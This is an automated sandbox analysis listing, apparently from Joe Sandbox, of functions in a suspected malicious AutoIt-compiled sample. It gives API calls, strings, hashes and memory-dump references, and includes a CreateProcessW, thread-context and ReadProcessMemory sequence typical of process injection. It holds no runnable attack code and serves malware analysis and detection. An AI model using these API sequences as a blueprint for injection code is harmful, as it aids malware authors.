                                    • Instruction ID: 01be710208ef2beafa7f4f6a981280ce72720c3b136e20febe2b54b6ef96c2a3
                                    • Opcode Fuzzy Hash: 913448d74a68e9f0a1628d9b978326e46b89348e21110a8e1fbaed9109a106d7
                                    • Instruction Fuzzy Hash: 3C5191B1D0060AEFCB21AFA4C849FEE7FB9AF45310F14015AF405A7292D7799901CB61
                                    Function 00783B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B40
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B61
                                    • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00783B0F,SwapMouseButtons,00000004,?), ref: 00783B83
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 2de371bfc866adf56e9172ece199e67dedeafec36f1d8311717c6b9e5ba34324
                                    • Instruction ID: f38ce794ab477684ea4bdc985c27ddaec797c4e39314699dfb8818888cfa3c30
                                    • Opcode Fuzzy Hash: 2de371bfc866adf56e9172ece199e67dedeafec36f1d8311717c6b9e5ba34324
                                    • Instruction Fuzzy Hash: 5D112AF5550208FFDB20DFA9DC44AEEBBBCEF04B84B108459A805D7110E2359F409760
                                    Function 01E412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 01E41A5B
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E41AF1
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E41B13
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                    • Instruction ID: 2f53f5e92721d232e3537d0420b22467b8b95a205597d22acdec18887cbe121a
                                    • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                    • Instruction Fuzzy Hash: C8620B34A14258DBEB24CFA4D850BDEB772EF58304F1091A9E20DEB390E7759E81CB59
                                    Function 0078DFD0 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON
                                    Download Yara Rule
                                    Strings
                                    • Variable must be of type 'Object'., xrefs: 007D32B7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 4af2a5f7274b9694d5d31fe88095f4ac278ff314b65bfcf26df89d82d9c37cde
                                    • Instruction ID: fa7e41bb9e548e908b9b7761be9fecf558ed1658174fc0835b23a7a03c99ad32
                                    • Opcode Fuzzy Hash: 4af2a5f7274b9694d5d31fe88095f4ac278ff314b65bfcf26df89d82d9c37cde
                                    • Instruction Fuzzy Hash: DFC2AF71E40205CFCB24EF58C884AADB7B1FF09310F24856AE956AB391E779ED41CB91
                                    Function 00783923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 007C33A2
                                      • Part of subcall function 00786B57: _wcslen.LIBCMT ref: 00786B6A
                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00783A04
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_wcslen
                                    • String ID: Line:
                                    • API String ID: 2289894680-1585850449
                                    • Opcode ID: a48e5b62c4b2abc24e76b1daeec206eef8955005d07ff262d0d89fa3a434dc81
                                    • Instruction ID: f60c30f5cda358be7561ebb9af66b3ee67884ab11d1710ab5add5b5495d2ebaa
                                    • Opcode Fuzzy Hash: a48e5b62c4b2abc24e76b1daeec206eef8955005d07ff262d0d89fa3a434dc81
                                    • Instruction Fuzzy Hash: 2D31C271488300AAC725FB24DC49BEBB7DCAF40B15F00492EF59992191EB7CAA49C7C2
                                    Function 0079FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                    Download Yara Rule
                                    APIs
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 007A0668
                                      • Part of subcall function 007A32A4: RaiseException.KERNEL32(?,?,?,007A068A,?,00851444,?,?,?,?,?,?,007A068A,00781129,00848738,00781129), ref: 007A3304
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 007A0685
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Exception@8Throw$ExceptionRaise
                                    • String ID: Unknown exception
                                    • API String ID: 3476068407-410509341
                                    • Opcode ID: 95e8ca1b9f9b49a88213e75cf542a578ca9539f79ded5913d7d41ad0f318e43d
                                    • Instruction ID: b1285dfba7bc56f4098776013c3cd71f4ebed3c419fbe47fc245c113e259addf
                                    • Opcode Fuzzy Hash: 95e8ca1b9f9b49a88213e75cf542a578ca9539f79ded5913d7d41ad0f318e43d
                                    • Instruction Fuzzy Hash: FEF0C23490020DF78F04BAA4E85ADAE776CAE82354B604A31F924D65D2EF7DEA65C5C0
                                    Function 007F3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 007F302F
                                    • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007F3044
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Temp$FileNamePath
                                    • String ID: aut
                                    • API String ID: 3285503233-3010740371
                                    • Opcode ID: 8475aaa81bc4a91866db8c7b407a6c1ef53c1dcb8e8729bf6d642ebf93425ebf
                                    • Instruction ID: 8ade179a6b10227a135e203b3d14df2992cf8bbab6254d9929fcdc5ab7cb549c
                                    • Opcode Fuzzy Hash: 8475aaa81bc4a91866db8c7b407a6c1ef53c1dcb8e8729bf6d642ebf93425ebf
                                    • Instruction Fuzzy Hash: 1ED05EB254032867DA20A7A4AC0EFCB3B6CEB05750F0002A1B655E2091EAF49984CAD0
                                    Function 00807F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 008082F5
                                    • TerminateProcess.KERNEL32(00000000), ref: 008082FC
                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 008084DD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process$CurrentFreeLibraryTerminate
                                    • String ID:
                                    • API String ID: 146820519-0
                                    • Opcode ID: e932aad0eca4782192ede5bf2d2b436e436aa8c80c29e222e19eb72e6ece0933
                                    • Instruction ID: a0480fcf5031fe6423e8ea86e2890f8b02bee6367e418a6c983835786d7ae22c
                                    • Opcode Fuzzy Hash: e932aad0eca4782192ede5bf2d2b436e436aa8c80c29e222e19eb72e6ece0933
                                    • Instruction Fuzzy Hash: F5125B71908341DFD754DF28C884A2ABBE5FF85318F04895DE989CB392CB35E985CB92
                                    Function 007810F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00781BF4
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00781BFC
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00781C07
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00781C12
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00781C1A
                                      • Part of subcall function 00781BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00781C22
                                      • Part of subcall function 00781B4A: RegisterWindowMessageW.USER32(00000004,?,007812C4), ref: 00781BA2
                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0078136A
                                    • OleInitialize.OLE32 ref: 00781388
                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 007C24AB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                    • String ID:
                                    • API String ID: 1986988660-0
                                    • Opcode ID: b28d83da46c11c4ef79a1e6dba1781999d667884430710aa80bcc54cfac6e306
                                    • Instruction ID: 908ce037269e77433c52258164690217952ee361540fb9145ff3799d3cd54bbd
                                    • Opcode Fuzzy Hash: b28d83da46c11c4ef79a1e6dba1781999d667884430710aa80bcc54cfac6e306
                                    • Instruction Fuzzy Hash: A371B9B49513008FCF84EFB9A84D7A53AE5FB88346754863AD51AC7361FB384889CF45
                                    Function 007EC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00783923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00783A04
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007EC259
                                    • KillTimer.USER32(?,00000001,?,?), ref: 007EC261
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 007EC270
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_Timer$Kill
                                    • String ID:
                                    • API String ID: 3500052701-0
                                    • Opcode ID: f7617600ef70528032bd26599e9ce66f1c458b80479e07d77417e56ecd342a9f
                                    • Instruction ID: 28eeafc921f07222ec38871b5eaaef21d3404fdd15153a367da4fcb09a99425a
                                    • Opcode Fuzzy Hash: f7617600ef70528032bd26599e9ce66f1c458b80479e07d77417e56ecd342a9f
                                    • Instruction Fuzzy Hash: E831C574905384AFEB239F658855BE7BBECAF0A308F004499D2DA97241C3785A85CB51
                                    Function 007B86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,007B85CC,?,00848CC8,0000000C), ref: 007B8704
                                    • GetLastError.KERNEL32(?,007B85CC,?,00848CC8,0000000C), ref: 007B870E
                                    • __dosmaperr.LIBCMT ref: 007B8739
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                    • String ID:
                                    • API String ID: 490808831-0
                                    • Opcode ID: 1513a7a4bb1d14ddda25f5f79532c313eccbf8084f917a3c8683f7a856352d9b
                                    • Instruction ID: 90b5730838f4e62e1af10849dd0d8b50288986f99d8593f0d291f9df550d7843
                                    • Opcode Fuzzy Hash: 1513a7a4bb1d14ddda25f5f79532c313eccbf8084f917a3c8683f7a856352d9b
                                    • Instruction Fuzzy Hash: CC014E3260572066D6E47374A8497FE678D5B8277CF390119F8148B2D3DEBDCC81C552
                                    Function 0078DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    • TranslateMessage.USER32(?), ref: 0078DB7B
                                    • DispatchMessageW.USER32(?), ref: 0078DB89
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0078DB9F
                                    • Sleep.KERNEL32(0000000A), ref: 0078DBB1
                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 007D1CC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                    • String ID:
                                    • API String ID: 3288985973-0
                                    • Opcode ID: 8a4105b4b5fec235f31ce45ce05e523d250ee9ba886857aee48335363cc9c136
                                    • Instruction ID: 3b4e2f76e1a9407aa877bf6c253903f6c48d57727acad431a17f5c8eb7784292
                                    • Opcode Fuzzy Hash: 8a4105b4b5fec235f31ce45ce05e523d250ee9ba886857aee48335363cc9c136
                                    • Instruction Fuzzy Hash: 50F05E706843409BEB30DBA09C49FEA73BDFF44311F508929E61AC30C0DB7894488B25
                                    Function 007F2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,007F2CD4,?,?,?,00000004,00000001), ref: 007F2FF2
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F3006
                                    • CloseHandle.KERNEL32(00000000,?,007F2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F300D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 1aff14615981d691d566a2e094f30d2178e41bd2bfa2cf5171c7c534a4d66c28
                                    • Instruction ID: fe4c005f9f71335c0ff7097f3fbc5d31fa7b5b5120d87dd6d35548b06861dc1d
                                    • Opcode Fuzzy Hash: 1aff14615981d691d566a2e094f30d2178e41bd2bfa2cf5171c7c534a4d66c28
                                    • Instruction Fuzzy Hash: 3AE086322C022477D2302755BC0DFDB3A1DEB86B71F108210F729751D086A0160142A8
                                    Function 00791310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 007917F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Init_thread_footer
                                    • String ID: CALL
                                    • API String ID: 1385522511-4196123274
                                    • Opcode ID: 78bc6c39c2fa5d2bcb3960c8835127de29897e5fd0f96f1c7dc6169f76bf9004
                                    • Instruction ID: 44edf88f83be3483aef64e366e189834e52180ce2a1550c22e54a27e58c5db20
                                    • Opcode Fuzzy Hash: 78bc6c39c2fa5d2bcb3960c8835127de29897e5fd0f96f1c7dc6169f76bf9004
                                    • Instruction Fuzzy Hash: 7222BC70608342DFCB14DF14E484A2ABBF1BF89314F54895DF4968B3A1D739E865CB92
                                    Function 007F6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 007F6F6B
                                      • Part of subcall function 00784ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00851418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00784EFD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: LibraryLoad_wcslen
                                    • String ID: >>>AUTOIT SCRIPT<<<
                                    • API String ID: 3312870042-2806939583
                                    • Opcode ID: 5dd1045738619d43ede3b73824061c3d59eba86183d603d2ca0aeb66030731ea
                                    • Instruction ID: 151c2742b3afeff1643a32f98c5befc4c2a8d920259d9e11e1c00973a13e9b42
                                    • Opcode Fuzzy Hash: 5dd1045738619d43ede3b73824061c3d59eba86183d603d2ca0aeb66030731ea
                                    • Instruction Fuzzy Hash: 4EB17A31108205DFDB18FF20C89596AB7E5BF94310F14892DF596972A2EB38ED49CB92
                                    Function 00782DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetOpenFileNameW.COMDLG32(?), ref: 007C2C8C
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 00782DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00782DC4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Name$Path$FileFullLongOpen
                                    • String ID: X
                                    • API String ID: 779396738-3081909835
                                    • Opcode ID: 26f86d6eae62979c48995b9351456530fa49e2b8629a14b7f11ca4e34016086c
                                    • Instruction ID: c2ad12b6c7fc7df93be76991dfbfece6f5de698dc123a1193ebff560dbdca86c
                                    • Opcode Fuzzy Hash: 26f86d6eae62979c48995b9351456530fa49e2b8629a14b7f11ca4e34016086c
                                    • Instruction Fuzzy Hash: A5219371A002589BCF01EF94C849BEE7BF8AF49715F008059E505E7242EBBC5A498FA1
                                    Function 007F2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __fread_nolock
                                    • String ID: EA06
                                    • API String ID: 2638373210-3962188686
                                    • Opcode ID: e038a17287da4a6e73e7967a956485b6ca0c62a0274ad1f53de1f832250b5a0f
                                    • Instruction ID: baea5e1590adc52213653a74a690bcb2d15063119f9e2b1bd44f60dae28f7dcc
                                    • Opcode Fuzzy Hash: e038a17287da4a6e73e7967a956485b6ca0c62a0274ad1f53de1f832250b5a0f
                                    • Instruction Fuzzy Hash: C101B971904258BEDF18D7A8C85AEFE7BF8DB45301F00459AE152D2181E578E7148B60
                                    Function 00783837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00783908
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
